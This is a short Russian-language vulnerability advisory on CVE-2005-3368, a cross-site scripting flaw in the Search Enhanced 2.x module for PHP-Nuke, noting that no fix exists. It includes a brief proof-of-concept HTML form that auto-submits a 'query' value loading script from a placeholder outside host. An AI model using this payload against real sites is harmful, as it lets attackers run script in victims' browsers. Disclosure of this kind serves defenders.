Межсайтовый скриптинг в PHP-Nuke в модуле Search Enhanced

Дата публикации:	31.10.2005
Всего просмотров:	1920
Опасность:	Низкая
Наличие исправления:	Нет
Количество уязвимостей:	1
CVE ID:	CVE-2005-3368
Вектор эксплуатации:	Удаленная
Воздействие:	Межсайтовый скриптинг
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	Search Enhanced 2.x (модуль к PHP-Nuke)
	Уязвимые версии: PHP-Nuke Search Enhanced 2.x Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует в модуле Search Enhanced из-за недостаточной обработки входных данных в параметре query. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример: <html> < form name=searchform method=post action= http://[target]/modules.php?name=Search_Enhanced> < input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'> < input type=submit name=sub> < script>document.searchform.sub.click()</script> < /html> URL производителя: www.phpnuke-service.de Решение: Способов устранения уязвимости не существует в настоящее время. Источник:
Ссылки:	PHP-Nuke Search Cross-Site Scripting Vulnerability

Межсайтовый скриптинг в PHP-Nuke в модуле Search Enhanced

Подпишитесь на email рассылку